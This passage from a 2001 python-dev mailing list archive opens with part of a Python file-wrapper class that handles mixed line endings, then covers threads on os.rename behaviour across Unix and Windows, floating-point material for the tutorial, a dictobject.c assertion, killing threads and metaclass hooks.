0 ) and return_pos >=0: # we have a Mac line line = Buffer[:return_pos]+ "\n" TotalBytes = return_pos+1 break elif newline_pos >= 0: # we have a Posix line line = Buffer[:newline_pos]+ "\n" TotalBytes = newline_pos+1 break else: # we need a larger buffer NewBuffer = self._file.read(self._BufferSize) if NewBuffer: Buffer = Buffer + NewBuffer else: # we are at the end of the file, without a line ending. self._file.seek(start_pos + len(Buffer)) return Buffer self._file.seek(start_pos + TotalBytes) return line def readlines(self,sizehint = None): """ readlines acts like the regular readlines, except that it understands any of the standard text file line endings ("\r\n", "\n", "\r"). If sizehint is used, it will read a a mximum of that many bytes. It will not round up, as the regular readline does. This means that if your buffer size is less thatn the length of the next line, you won't get anything. """ if sizehint: Data = self._file.read(sizehint) else: Data = self._file.read() if len(Data) == sizehint: #print "The buffer is full" FullBuffer = 1 else: FullBuffer = 0 Data = Data.replace("\r\n","\n").replace("\r","\n") Lines = [line + "\n" for line in Data.split('\n')] #print Lines ## If the last line is only a linefeed it is an extra line if Lines[-1] == "\n": del Lines[-1] ## if it isn't then the last line didn't have a linefeed, so we need to remove the one we put on. else: ## or it's the end of the buffer if FullBuffer: #print "the file is at:",self._file.tell() #print "the last line has length:",len(Lines[-1]) self._file.seek(-(len(Lines[-1])-1),1) # reset the file position del(Lines[-1]) else: Lines[-1] = Lines[-1][:-1] return Lines def readnumlines(self,NumLines = 1): """ readnumlines is an extension to the standard file object. It returns a list containing the number of lines that are requested. I have found this to be very usefull, and allows me to avoid the many loops like: lines = [] for i in range(N): lines.append(file.readline()) Also, If I ever get around to writing this in C, it will provide a speed improvement. """ Lines = [] while len(Lines) < NumLines: Lines.append(self.readline()) return Lines def read(self,size = None): """ read acts like the regular read, except that it tranlates any of the standard text file line endings ("\r\n", "\n", "\r") into a "\n" If size is used, it will read a maximum of that many bytes, before translation. This means that if the line endings have more than one character, the size returned will be smaller. This could gbe patched, but it didn't seem worth it. If you want that much control, use a binary file. """ if size: Data = self._file.read(size) else: Data = self._file.read() return Data.replace("\r\n","\n").replace("\r","\n") def write(self,string): """ write is just like the regular one, except that it uses the line separator specified when the file was opened for writing or appending. """ self._file.write(string.replace("\n",self.LineSep)) def writelines(self,list): for line in list: self.write(line) # The rest of the standard file methods mapped def close(self): self._file.close() self.closed = 1 def flush(self): self._file.flush() def fileno(self): return self._file.fileno() def seek(self,offset,whence = 0): self._file.seek(offset,whence) def tell(self): return self._file.tell() From guido at digicool.com Wed May 23 01:46:53 2001 From: guido at digicool.com (Guido van Rossum) Date: Tue, 22 May 2001 19:46:53 -0400 Subject: [Python-Dev] unifying os.rename semantics across platform In-Reply-To: Your message of "Tue, 22 May 2001 16:54:42 CDT." <15114.57378.887742.531145@beluga.mojam.com> References: <15114.57378.887742.531145@beluga.mojam.com> Message-ID: <200105222346.f4MNkr104833@odiug.digicool.com> > It was brought to my attention a week ago by a client that os.rename > semantics differ between Unix and Windows. On Unix, if the destination file > already exists it is silently deleted. On Windows, an exception is raised. > I was able to verify this for Python 2.0 on Windows98. I assume nothing > changed for 2.1, but I can't verify that. I've always known this, and assumed it was common knowledge. Sorry. ;-) > (Windows trashed my partition > table and my Linux root partition while I was downloading 2.1. > Consequently, I no longer run Windows. Take that, Bill...) I haven't > checked the Mac yet (will do that when I get back to the US), but I think > that os.rename should have the same semantics across all platforms. To the > extent reasonably possible, I think this should also be true of other common > functions exposed through the os module. > > On the (unsupportable) theory that to-date, more Python apps have been > written and/or deployed on Unix-like systems and that where Windows apps are > concerned, many developers will have added a thin wrapper to mimic the Unix > semantics, I think less breakage would result if the Unix semantics were > implemented in the Windows version. It appears that is what POSIX > compliance would demand as well. > > Skip I certainly wouldn't want to try to emulate the Windows semantics on Unix. However, I think that emulating the correct Posix semantics on Windows is not possible either. The Posix rename() call guarantees that it is atomic: there is no point in time where the file doesn't exist at all (and a system or program crash can't delete the file). I wouldn't know how to do that in Windows -- the straightforward version if os.path.exists(target): os.unlink(target) os.rename(source, target) leaves a vulnerability open where the target doesn't exist and if at that point the system crashes or the program is killed, you lose the target. I would prefer to document the difference so applications can decide how to deal with this. --Guido van Rossum (home page: http://www.python.org/~guido/) From guido at digicool.com Wed May 23 01:50:29 2001 From: guido at digicool.com (Guido van Rossum) Date: Tue, 22 May 2001 19:50:29 -0400 Subject: [Python-Dev] FP vs. tutorial In-Reply-To: Your message of "Tue, 22 May 2001 14:44:09 PDT." References: Message-ID: <200105222350.f4MNoUj04853@odiug.digicool.com> > Who was it that said every equation will halve your audience? Einstein. > I agree with that, the tutorial should try to be as broad and simple > as possible. But keep in mind that the particular Python tutorial we're talking about is intended for an audience of folks who already know how to program. I vote against dumbing this down. --Guido van Rossum (home page: http://www.python.org/~guido/) From michel at digicool.com Wed May 23 02:17:59 2001 From: michel at digicool.com (Michel Pelletier) Date: Tue, 22 May 2001 17:17:59 -0700 (PDT) Subject: [Python-Dev] FP vs. tutorial In-Reply-To: <200105222350.f4MNoUj04853@odiug.digicool.com> Message-ID: On Tue, 22 May 2001, Guido van Rossum wrote: > > I agree with that, the tutorial should try to be as broad and simple > > as possible. > > But keep in mind that the particular Python tutorial we're talking > about is intended for an audience of folks who already know how to > program. I vote against dumbing this down. Now that I've actually read the tutorial (wink) I see the true target audience. For some reason, I thought it was oriented more toward the CP4E audience. Is there a python "children's book" complete with big red dogs and rabbits in waistcoats? That would be an interesting project... -Michel From guido at digicool.com Wed May 23 02:20:25 2001 From: guido at digicool.com (Guido van Rossum) Date: Tue, 22 May 2001 20:20:25 -0400 Subject: [Python-Dev] FP vs. tutorial In-Reply-To: Your message of "Tue, 22 May 2001 17:17:59 PDT." References: Message-ID: <200105230020.f4N0KPU05103@odiug.digicool.com> > Is there a python "children's book" complete with big red dogs and rabbits > in waistcoats? That would be an interesting project... See http://www.python.org/sigs/edu-sig/ and http://www.python.org/doc/Intros.html (the latter has a section with intros for non-programmers). --Guido van Rossum (home page: http://www.python.org/~guido/) From tim.one at home.com Wed May 23 02:23:42 2001 From: tim.one at home.com (Tim Peters) Date: Tue, 22 May 2001 20:23:42 -0400 Subject: [Python-Dev] FP vs. tutorial In-Reply-To: Message-ID: I struggled with a way to do a better job of explaining this stuff last night. As I see others already said, the Tutorial is not aimed at script kiddies, or non-programmers, or even programming newbies, but at programmers who are simply new to Python. So everything I put in the tutorial was either jarringly out of place, or inadequate to address the audience you (Michel) have in mind. But I agree that's an important audience, and I spend a fair chunk of my life now anyway eexplaining this stuff over & over to those who think computing a ratio of two integers is akin to solving fourth order differential equations . In the end I decided to write a Tutorial Appendix in a much gentler style. It doesn't really fit with the rest of the Tutorial, but then that's *why* it's an Appendix. The patch is here: http://sourceforge.net/tracker/index.php?func=detail& aid=426208&group_id=5470&atid=305470 I also changed the tutorial fp examples so they have an excellent chance of displaying the same strings across all platforms, and even if Python 10K defaults to decimal floating-point someday (perhaps in the year 10000, as its name suggests). From gward at python.net Wed May 23 02:33:11 2001 From: gward at python.net (Greg Ward) Date: Tue, 22 May 2001 20:33:11 -0400 Subject: [Python-Dev] unifying os.rename semantics across platform In-Reply-To: <200105222346.f4MNkr104833@odiug.digicool.com>; from guido@digicool.com on Tue, May 22, 2001 at 07:46:53PM -0400 References: <15114.57378.887742.531145@beluga.mojam.com> <200105222346.f4MNkr104833@odiug.digicool.com> Message-ID: <20010522203311.E1245@gerg.ca> On 22 May 2001, Guido van Rossum said: > I would prefer to document the difference so applications can decide > how to deal with this. I agree -- it has always seemed to me that the standard library merely exposes the underlying OS functionality for you. This puts portability somewhat in the hands of the application writer -- with power comes responsibility. I think that's the way it should be; any attempt to convert OS A to the semantics of OS B will fall down somewhere. Witness the loss-of-atomicity in Guido's example. I'm sure any other semantic difference between OSes would have similar "gotchas" if we attempted to paper over them. Greg -- Greg Ward - just another Python hacker gward at python.net http://starship.python.net/~gward/ Beware of altruism. It is based on self-deception, the root of all evil. From tim.one at home.com Wed May 23 08:31:29 2001 From: tim.one at home.com (Tim Peters) Date: Wed, 23 May 2001 02:31:29 -0400 Subject: [Python-Dev] FP vs. tutorial In-Reply-To: <20010522094157.A1245@gerg.ca> Message-ID: [Greg Ward, on http://www.lahey.com/float.htm] > I found this article more useful, interesting, and informative than > whatever I learned about binary floating-point in my academic years. > Good link, Tim. Two catches: > > * I can just barely follow the FORTRAN examples; I very much doubt > the average Python newbie would have any more luck than me The goal is to frighten them: the ones with the right stuff to use fp without destroying a satellite, bringing down the Internet, designing a pacemaker that fails when rounding a corner clockwise at 1.37g, causing a small country's economy to collapse, making jet fighters spontaneously turn upside down when crossing the equator, or triggering WW III by accident, will persist . BTW, not all of those were made up! > * I tried several of the FORTRAN examples in Python, and did not > witness any of the gotchas they are meant to illustrate. Possibly > it's just single-precision vs. double-precision difference, but > Python 2.1 under Linux 2.2 on an Athlon compiled with gcc 2.95.2 > doesn't demonstrate the same gotchas as that article does. You can't illustrate the last half of their examples in Python without playing obscure games with the struct module, because they rely on the existence of more than one size of floating-point type. Your lack of luck with the first half of their examples is indeed solely due to that he used single-precision examples and Python's float is double. You need to find different numbers to show the same things in Python; like so: # Binary Floating Point x = 100000000000. * 0.00000000001 if x != 1.0: print "Oops! It's %r" % x # Inexactness a = 98. / 49. reciprocal = 1./49. b = 98. * reciprocal if a != b: print "Oops! They're %r and %r" % (a, b) # Crazy Conversions x = 32.05 y = x * 100. # "looks like" 3205. if display rounded i = int(y) # actually truncates to 3204 print y, i, repr(y) It's Real Work coming up with stuff like that. What I'm hearing is that people won't understand it anyway -- so screw it. If they want an education, they can prove it by doing a google search <0.6 wink>. From tim.one at home.com Wed May 23 08:44:14 2001 From: tim.one at home.com (Tim Peters) Date: Wed, 23 May 2001 02:44:14 -0400 Subject: [Python-Dev] unifying os.rename semantics across platform In-Reply-To: <200105222346.f4MNkr104833@odiug.digicool.com> Message-ID: [Guido] > ... > I certainly wouldn't want to try to emulate the Windows semantics on > Unix. However, I think that emulating the correct Posix semantics on > Windows is not possible either. Neither is it desirable: Windows isn't POSIX, and Windows users would be appalled if os.rename() could silently destroy files. If such a function needs to exist, create a new cowboy_unix_tricks module instead . This has never been a problem for me because I always check to see whether the target file exists before using os.rename(), and do something else if it does. I understand that's vulnerable to races, but nobody asked whether I cared about that . > The Posix rename() call guarantees that it is atomic: there is no > point in time where the file doesn't exist at all (and a system or > program crash can't delete the file). I wouldn't know how to do > that in Windows -- the straightforward version > > if os.path.exists(target): > os.unlink(target) > os.rename(source, target) > > leaves a vulnerability open where the target doesn't exist and if at > that point the system crashes or the program is killed, you lose the > target. More obvious, it also fails if target simply exists and is open (you can't unlink an open file on Windows). Nevertheless, you can do this renaming safely on Windows, via doing the right system magic to make rename happen at reboot time before Windows actually starts. But I'm not sure Skip's client would want to reboot each time Python did a file rename . > I would prefer to document the difference so applications can decide > how to deal with this. Yup! From MarkH at ActiveState.com Wed May 23 10:55:17 2001 From: MarkH at ActiveState.com (Mark Hammond) Date: Wed, 23 May 2001 18:55:17 +1000 Subject: [Python-Dev] FP vs. tutorial In-Reply-To: Message-ID: [Tim on a subject near and dear to his testicles] > It's Real Work coming up with stuff like that. What I'm hearing is that > people won't understand it anyway -- so screw it. If they want > an education, > they can prove it by doing a google search <0.6 wink>. I am inclined to agree. IMO, The Python tutorial or other documentation should include a basic example of these "errors", and a link to _either_ of the HTML pages referenced in this thread as an optional extra. Just enough to stop _most_ of the "this is a bug" posts - but stopping well short of any attempt to "educate" them in floating point madness. Just _one_ example of floats not being exact would suffice. Going from my personal experience, I learnt long ago that floating point is not exact. That is all I needed to know to move on. I didn't like it, and I didn't understand exactly why (I thought I did, but Tim put a stop to that misconception ), but I could move on once I had that skerrick of enlightenment. And believe it or not, some of my code _does_ use floats, and _does_ work! (well, works as well as the rest of my code anyway ) And-it-wasn't-even-Python-that-taught-me, Mark. From pf at artcom-gmbh.de Wed May 23 09:49:13 2001 From: pf at artcom-gmbh.de (Peter Funk) Date: Wed, 23 May 2001 09:49:13 +0200 (MEST) Subject: [Python-Dev] unifying os.rename semantics across platform In-Reply-To: <15114.57947.313813.522806@cj42289-a.reston1.va.home.com> from "Fred L. Drake, Jr." at "May 22, 2001 06:04:11 pm" Message-ID: Hi, Fred L. Drake, Jr. schrieb: > skip at pobox.com writes: > > On the (unsupportable) theory that to-date, more Python apps have been > > written and/or deployed on Unix-like systems and that where Windows apps are > > concerned, many developers will have added a thin wrapper to mimic the Unix > > semantics, I think less breakage would result if the Unix semantics were > > I don't know whether there are more deployed Python apps on Unix > than on Windows (and I've no good idea about how to find out), but I > think unifying the semantics one way or the other is a good thing. > Regardless of which set of semantics is chosen. I agree. May I suggest to add an optional third boolean parameter to os.rename called 'replace', which defaults either to TRUE or FALSE, so modifying existing apps will become even less hassle to potential porters. Here is a strawman to explain what I mean: -------------------------------------- import os def new_rename(src, dst, replace=0, old_rename=os.rename): if os.path.exists(dst): if replace: if not os.path.isdir(dst): os.remove(dst) else: # I'm not sure what to do here. recursive removal? dangerous! raise NotImplementedError else: raise OSError("%s already exists" % dst) return old_rename(src, dst) os.rename = new_rename -------------------------------------- Regards, Peter -- Peter Funk, Oldenburger Str.86, D-27777 Ganderkesee, Germany, Fax:+49 4222950260 office: +49 421 20419-0 (ArtCom GmbH, Grazer Str.8, D-28359 Bremen, Germany) From jack at oratrix.nl Wed May 23 13:15:10 2001 From: jack at oratrix.nl (Jack Jansen) Date: Wed, 23 May 2001 13:15:10 +0200 Subject: [Python-Dev] Assertion failed in dictobject.c Message-ID: <20010523111510.D504D3B8999@snelboot.oratrix.nl> I'm seeing the assert on line 525 in dictobject.c (revision 2.92) failing. The debugger tells me that ma_fill and ma_size are both 8. ma_used is 2, and interestingly hash is also 8. Going back to revision 2.90 fixes the problem (or masks it). -- Jack Jansen | ++++ stop the execution of Mumia Abu-Jamal ++++ Jack.Jansen at oratrix.com | ++++ if you agree copy these lines to your sig ++++ www.oratrix.nl/~jack | ++++ see http://www.xs4all.nl/~tank/ ++++ From skip at pobox.com Wed May 23 13:59:45 2001 From: skip at pobox.com (skip at pobox.com) Date: Wed, 23 May 2001 06:59:45 -0500 Subject: [Python-Dev] unifying os.rename semantics across platform In-Reply-To: References: <200105222346.f4MNkr104833@odiug.digicool.com> Message-ID: <15115.42545.172775.716565@beluga.mojam.com> >>>>> "Tim" == Tim Peters writes: Tim> [Guido] >> I would prefer to document the difference so applications can decide >> how to deal with this. Tim> Yup! Submitted as patch #426598, assigned to Dr. Doc (aka Fred). Skip From skip at pobox.com Wed May 23 14:11:51 2001 From: skip at pobox.com (skip at pobox.com) Date: Wed, 23 May 2001 07:11:51 -0500 Subject: [Python-Dev] unifying os.rename semantics across platform In-Reply-To: References: <15114.57947.313813.522806@cj42289-a.reston1.va.home.com> Message-ID: <15115.43271.480135.227059@beluga.mojam.com> Peter> I agree. May I suggest to add an optional third boolean Peter> parameter to os.rename called 'replace', which defaults either to Peter> TRUE or FALSE, so modifying existing apps will become even less Peter> hassle to potential porters. In his response to my post, Guido indicated there is a race condition. Between the time you delete the preexisting destination file and do the actual file rename, Windows could wink out on you, leaving you with the original src file and no original dst file. POSIX semantics require the rename to be atomic. This is just not going to be possible. Fred, perhaps my doc mod should be enhanced to identify the race condition for people who need to use os.rename on Windows and will be forced to first unlink the destination file. Skip From guido at digicool.com Wed May 23 15:19:24 2001 From: guido at digicool.com (Guido van Rossum) Date: Wed, 23 May 2001 09:19:24 -0400 Subject: [Python-Dev] FP vs. tutorial In-Reply-To: Your message of "Wed, 23 May 2001 02:31:29 EDT." References: Message-ID: <200105231319.f4NDJOs06485@odiug.digicool.com> I liked the text that Tim posted to SF, but I would like it even better if it also *contained* the text from the "PresentationError" moinmoin wiki page, rather than referring to it by URL. The moinmoin URL is not a good long-term name for that information -- printed copies of the tutorial will persist long after the moinmoin wiki has been moved or consolidated. Plus, instead of referring people to the moinmoin wiki page, I'd like to be able to refer them to the appendix of the tutorial! --Guido van Rossum (home page: http://www.python.org/~guido/) From guido at digicool.com Wed May 23 15:32:17 2001 From: guido at digicool.com (Guido van Rossum) Date: Wed, 23 May 2001 09:32:17 -0400 Subject: [Python-Dev] FP vs. tutorial In-Reply-To: Your message of "Wed, 23 May 2001 18:55:17 +1000." References: Message-ID: <200105231332.f4NDWH706564@odiug.digicool.com> [Mark] > IMO, The Python tutorial or other documentation should include a basic > example of these "errors", and a link to _either_ of the HTML pages > referenced in this thread as an optional extra. > > Just enough to stop _most_ of the "this is a bug" posts - but > stopping well short of any attempt to "educate" them in floating > point madness. Just _one_ example of floats not being exact would > suffice. I agree: we don't have to explain *why* it happens. We just have to explain *that* it happens, so so folks don't think they've discovered a bug in Python. Or maybe we could do this: in the main text, explain and show *that* it happens, and refer to the appendix which can explain *why* it happens to those interested, in a gentle manner like what Tim already wrote. --Guido van Rossum (home page: http://www.python.org/~guido/) From guido at digicool.com Wed May 23 15:52:02 2001 From: guido at digicool.com (Guido van Rossum) Date: Wed, 23 May 2001 09:52:02 -0400 Subject: [Python-Dev] unifying os.rename semantics across platform In-Reply-To: Your message of "Wed, 23 May 2001 09:49:13 +0200." References: Message-ID: <200105231352.f4NDq3g06738@odiug.digicool.com> > May I suggest to add an optional third boolean parameter to > os.rename called 'replace', which defaults either to TRUE or FALSE, > so modifying existing apps will become even less hassle to potential > porters. I see no reason to change the API. In any case, for backwards compatibility, the default would have to be platform dependent, which strikes me as just as bad as the current situation. --Guido van Rossum (home page: http://www.python.org/~guido/) From thomas at xs4all.net Wed May 23 16:00:25 2001 From: thomas at xs4all.net (Thomas Wouters) Date: Wed, 23 May 2001 16:00:25 +0200 Subject: [Python-Dev] Python 2.1.1 Message-ID: <20010523160025.B690@xs4all.nl> As those of you on python-checkins might have noticed ;) I started checking in Python 2.1.1 bufixes. I'd hoped to finish all of my backlog today, but unfortuantely I'm now called away on a suprise emergency meeting, so I'm not sure if I'll make it. The 2.1.1 tree is sort of an unstable state right now, I'll fix that today in any case, but after the meeting. (As for why I started doing it: I just spent about two weeks of digging through Pine sourcecode, and its imap server in particular, and I decided I deserved a break -- Python reads like a Heinlein novel, after pine code: readable, straight-forward, and just enough complexity to keep it entertaining :) -- Thomas Wouters Hi! I'm a .signature virus! copy me into your .signature file to help me spread! From aahz at rahul.net Wed May 23 16:08:45 2001 From: aahz at rahul.net (Aahz Maruch) Date: Wed, 23 May 2001 07:08:45 -0700 (PDT) Subject: [Python-Dev] Killing threads Message-ID: <20010523140845.B092299C83@waltz.rahul.net> Okay, so we all know it isn't possible to kill threads cleanly and safely in any kind of cross-platform way. At the same time, a program that has a thread running haywire should be able to kill itself completely, so that a monitoring process can restart it. How hard would it be to do only that in a cross-platform way? I'm guessing that for Unix, we'd just send a hard signal (9 or 15). No clue what would need to happen for Windows and Mac. (This got brought up because I experimented with os._exit() as a possible solution, but that GPFs on Win98SE.) -- --- Aahz (@pobox.com) Hugs and backrubs -- I break Rule 6 <*> http://www.rahul.net/aahz/ Androgynous poly kinky vanilla queer het Pythonista I don't really mind a person having the last whine, but I do mind someone else having the last self-righteous whine. From thomas.heller at ion-tof.com Wed May 23 19:28:07 2001 From: thomas.heller at ion-tof.com (Thomas Heller) Date: Wed, 23 May 2001 19:28:07 +0200 Subject: [Python-Dev] New metaclass pattern (Was Re: Simulating Class (was Re: Does Python have Class methods)) References: Message-ID: <020301c0e3ad$bb559790$e000a8c0@thomasnotebook> [this message has also been posted to comp.lang.python] Guido's metaclass hook in Python goes this way: If a base class (let's better call it a 'base object') has a __class__ attribute, this is called to create the new class. From guido at digicool.com Wed May 23 20:02:06 2001 From: guido at digicool.com (Guido van Rossum) Date: Wed, 23 May 2001 14:02:06 -0400 Subject: [Python-Dev] New metaclass pattern (Was Re: Simulating Class (was Re: Does Python have Class methods)) In-Reply-To: Your message of "Wed, 23 May 2001 19:28:07 +0200." <020301c0e3ad$bb559790$e000a8c0@thomasnotebook> References: <020301c0e3ad$bb559790$e000a8c0@thomasnotebook> Message-ID: <200105231802.f4NI26408784@odiug.digicool.com> > [this message has also been posted to comp.lang.python] [And I'm cc'ing there] > Guido's metaclass hook in Python goes this way: > > If a base class (let's better call it a 'base object') > has a __class__ attribute, this is called to create the > new class. > > >From demo/metaclasses/index.html: > > class C(B): > a = 1 > b = 2 > > Assuming B has a __class__ attribute, this translates into: > > C = B.__class__('C', (B,), {'a': 1, 'b': 2}) Yes. > Usually B is an instance of a normal class. No, B should behave like a class, which makes it an instance of a metaclass. > So the above code will create an instance of B, > call B's __init__ method with 'C', (B,), and {'a': 1, 'b': 2}, > and assign the instance of B to the variable C. No, it will not create an instance of B. It will create an instance of B.__class__, which is a subclass of B. The difference between subclassing and instantiation is confusing, but crucial, when talking about metaclasses! See the ASCII art in my classic post to the types-sig: http://mail.python.org/pipermail/types-sig/1998-November/000084.html > I've ever since played with this metaclass hook, and > always found the problem that B would have to completely > simulate the normal python behaviour for classes (modifying > of course what you want to change). > > The problem is that there are a lot of successful and > unsucessful attribute lookups, which require a lot > of overhead when implemented in Python: So the result > is very slow (too slow to be usable in some cases). Yes. You should be able to subclass an existing metaclass! Fortunately, in the descr-branch code in CVS, this is possible. I haven't explored it much yet, but it should be possible to do things like: Integer = type(0) Class = Integer.__class__ # same as type(Integer) class MyClass(Class): ... MyObject = MyClass("MyObject", (), {}) myInstance = MyObject() Here MyClass declares a metaclass, and MyObject is a regular class that uses MyClass for its metaclass. Then, myInstance is an instance of MyObject. See the end of PEP 252 for info on getting the descr-branch code (http://python.sourceforge.net/peps/pep-0252.html). > ------ > > Python 2.1 allows to attach attributes to function objects, > so a new metaclass pattern can be implemented. > > The idea is to let B be a function having a __class__ attribute > (which does _not_ have to be a class, it can again be a function). Oh, yuck. I suppose this is fine if you want to experiment with metaclasses in 2.1, but please consider using the descr-branch code instead so you can see what 2.2 will be like! --Guido van Rossum (home page: http://www.python.org/~guido/) From mal at lemburg.com Wed May 23 20:40:58 2001 From: mal at lemburg.com (M.-A. Lemburg) Date: Wed, 23 May 2001 20:40:58 +0200 Subject: [Python-Dev] Daily Python URL on your Palm Message-ID: <3B0C043A.D5C9C604@lemburg.com> Just thought you might want to know that Fredrik's Daily Python URL can be downloaded onto the Palm as Avantgo Channel. Here's the URL for adding the channel: http://avantgo.com/mydevice/autoadd.html?title=Daily%20Python%20URL&url=http%3A%2F%2Fwww.pythonware.com%2Fdaily%2Findex.htm&max=100&depth=1&images=0&links=1&refresh=always&hours=1&dflags=0&hour=0&quarter=00&s=00 PS: Would be nice if Fredrik could provide a "printable" version of the Daily URL page, since the table layout doesn't work too well on the small Palm display. -- Marc-Andre Lemburg CEO eGenix.com Software GmbH ______________________________________________________________________ Company & Consulting: http://www.egenix.com/ Python Software: http://www.lemburg.com/python/ From thomas.heller at ion-tof.com Wed May 23 20:57:28 2001 From: thomas.heller at ion-tof.com (Thomas Heller) Date: Wed, 23 May 2001 20:57:28 +0200 Subject: [Python-Dev] New metaclass pattern (Was Re: Simulating Class (was Re: Does Python have Class methods)) References: <020301c0e3ad$bb559790$e000a8c0@thomasnotebook> <200105231802.f4NI26408784@odiug.digicool.com> Message-ID: <033901c0e3ba$36aaa870$e000a8c0@thomasnotebook> Let me try again (and please forgive my mistakes in the detail). The usual way (as in demo\metaclasses): class B_Meta: .... B = B_Meta('B', (), {}) class C(B): pass B is an instance of the (meta)class B_Meta. C is now another instance of the same (meta)class. because B.__class__, which is the (meta)class itself, is called, and returns a new instance. B_Meta can (and must) implement a lot of behaviour. In contrast, with my recipe: def MagicFunction(name, bases, dict): ...construct a class on the fly... ...create an instance of this class... return aninstance_of_a_class def B_Meta(): pass B_Meta.__class__ = MagicFunction class C(B): pass Now C is an_instance_of_a_class (which is an instance of a normal python class), and thus does inherit the normal behaviour of Python classes. Thomas PS: I'm sure this all will be much better in descr-branch. I've checked it out and am playing with it from time to time, but most of the time I have to use released Python versions. From tim.one at home.com Wed May 23 21:32:59 2001 From: tim.one at home.com (Tim Peters) Date: Wed, 23 May 2001 15:32:59 -0400 Subject: [Python-Dev] Python 2.1.1 In-Reply-To: <20010523160025.B690@xs4all.nl> Message-ID: [Thomas Wouters] > > As those of you on python-checkins might have noticed ;) I started > checking in Python 2.1.1 bufixes. And bless you for it, Thomas! > I'd hoped to finish all of my backlog today, but unfortuantely I'm > now called away on a suprise emergency meeting, Now that sucks. Tell your manager that you'll only attend planned emergency meetings from now on: Guido plans Python crises years in advance, and it shows in the relative cleanliness of the Python codebase . From nas at python.ca Wed May 23 21:41:14 2001 From: nas at python.ca (Neil Schemenauer) Date: Wed, 23 May 2001 12:41:14 -0700 Subject: [Python-Dev] Python 2.1.1 In-Reply-To: ; from tim.one@home.com on Wed, May 23, 2001 at 03:32:59PM -0400 References: <20010523160025.B690@xs4all.nl> Message-ID: <20010523124114.A4747@glacier.fnational.com> Tim Peters wrote: > Guido plans Python crises years in advance, and it shows in the > relative cleanliness of the Python codebase . I don't think Thomas has a time machine. Neil From tim.one at home.com Wed May 23 21:45:06 2001 From: tim.one at home.com (Tim Peters) Date: Wed, 23 May 2001 15:45:06 -0400 Subject: [Python-Dev] Killing threads In-Reply-To: <20010523140845.B092299C83@waltz.rahul.net> Message-ID: [Aahz] > Okay, so we all know it isn't possible to kill threads cleanly and > safely in any kind of cross-platform way. At the same time, a program > that has a thread running haywire should be able to kill itself > completely, so that a monitoring process can restart it. How hard would > it be to do only that in a cross-platform way? Since Python is written in C, and C says nothing about this, you need a platform expert for each platform covered by "cross" . > I'm guessing that for Unix, we'd just send a hard signal (9 or 15). No > clue what would need to happen for Windows and Mac. > > (This got brought up because I experimented with os._exit() as a > possible solution, but that GPFs on Win98SE.) Please open a bug report on that, then, with a tiny test case if possible. This worked fine on Win98SE for me just now: import thread, os, time def task(): while 1: print "x", time.sleep(.1) for i in range(10): thread.start_new_thread(task, ()) time.sleep(5) os._exit(1) Windows kills all threads spawned by a process when "the main thread" exits. You don't need to do os._exit(), and sys.exit() is normally a much better idea (else, e.g., stdio buffers may not get flushed to disk). From thomas at xs4all.net Wed May 23 22:27:51 2001 From: thomas at xs4all.net (Thomas Wouters) Date: Wed, 23 May 2001 22:27:51 +0200 Subject: [Python-Dev] Python 2.1.1 In-Reply-To: <20010523124114.A4747@glacier.fnational.com>; from nas@python.ca on Wed, May 23, 2001 at 12:41:14PM -0700 References: <20010523160025.B690@xs4all.nl> <20010523124114.A4747@glacier.fnational.com> Message-ID: <20010523222751.G690@xs4all.nl> On Wed, May 23, 2001 at 12:41:14PM -0700, Neil Schemenauer wrote: > Tim Peters wrote: > > Guido plans Python crises years in advance, and it shows in the > > relative cleanliness of the Python codebase . > > I don't think Thomas has a time machine. *Don't* get me started on that. If only Guido would stop hogging the damned thing, I could be a 34-year-old millionaire in a 10-room house and 8 girlfriends ! Now-I'm-short-ten-years-nine-million-eight-rooms-and-seven-girlfriends-ly y'rs, -- Thomas Wouters Hi! I'm a .signature virus! copy me into your .signature file to help me spread! From tim.one at home.com Wed May 23 22:32:04 2001 From: tim.one at home.com (Tim Peters) Date: Wed, 23 May 2001 16:32:04 -0400 Subject: [Python-Dev] Assertion failed in dictobject.c In-Reply-To: <20010523111510.D504D3B8999@snelboot.oratrix.nl> Message-ID: [Jack Jansen] > I'm seeing the assert on line 525 in dictobject.c (revision 2.92) > failing. The debugger tells me that ma_fill and ma_size are both 8. > ma_used is 2, and interestingly hash is also 8. You wouldn't happen to have a reproducible test case? That hash==8 is almost certainly a red herring -- or a sign of wild stores . > Going back to revision 2.90 fixes the problem (or masks it). Instead of: assert(mp->ma_fill < mp->ma_size); this code used to be: if (mp->ma_fill >= mp->ma_size) { /* No room for a new key. * This only happens when the dict is empty. * Let dictresize() create a minimal dict. */ assert(mp->ma_used == 0); if (dictresize(mp, 0) != 0) return -1; assert(mp->ma_fill < mp->ma_size); } so the dict would get resized whenever ma_fill >= ma_size, although the code only *expected* that to happen when the dict table was NULL. It was perhaps happening in other cases too. The dict is never empty (NULL) after the patch, so the special case for "empty" got replaced by an assert. Offhand I don't see how this could be triggering -- although *something* about the 2.90 logic makes me uneasy! Ah, mp->ma_fill >= mp->ma_size wasn't a correct test: filled slots that aren't used slots don't stop a new key from being added. Assuming that's it, 2.90 could do needless calls to dictresize, but the new version does a bogus assert instead. So replace the current version's offending assert(mp->ma_fill < mp->ma_size); with assert(mp->ma_used < mp->ma_size); Let me know whether that solves it. 2.90 may also suffer a bogus assert(mp->ma_used == 0); failure. It's not easy to provoke any of this, though (requires exactly the right sequence of mixed inserts and deletes, with hash codes hitting exactly the right dict slots). From barry at digicool.com Wed May 23 22:52:22 2001 From: barry at digicool.com (Barry A. Warsaw) Date: Wed, 23 May 2001 16:52:22 -0400 Subject: [Python-Dev] Python 2.1.1 References: <20010523160025.B690@xs4all.nl> <20010523124114.A4747@glacier.fnational.com> <20010523222751.G690@xs4all.nl> Message-ID: <15116.8966.324136.897953@anthem.wooz.org> >>>>> "TW" == Thomas Wouters writes: TW> *Don't* get me started on that. If only Guido would stop TW> hogging the damned thing, I could be a 34-year-old millionaire TW> in a 10-room house and 8 girlfriends ! It's really not as easy as all that, though. When Guido's not around, I've been known to, er, take The Machine for a spin (sshh! Do /not/ tell him!). The first time I did, I didn't realize that the blue toggle had to be in the down position, and when I stepped out, everybody was speaking Esperanto, had half their heads shaved, and were toting around what looked like a cross between a dog and a beach ball (it drooled incessantly). Fortunately, The Machine has a reset button (oddly labeled "History Erase Button" and guarded by a candy-crazed TV announcer-like automaton who must be coaxed from the button with a marshmallow s'more). The second time I used it, I'd forgotten that you must keep your left hand on the silver sphere while you line up the parallel lines with the lip-actuated alpha wheel. Silly me, I'd removed my left hand just before alignment in order to twist the fluroscopic reflection tube a quarter rotation out of phase (rule of thumb: never listen to that automaton when he's licked the last of the chocolate-y goo from his fingers. He'll say anything to get another s'more.) You really 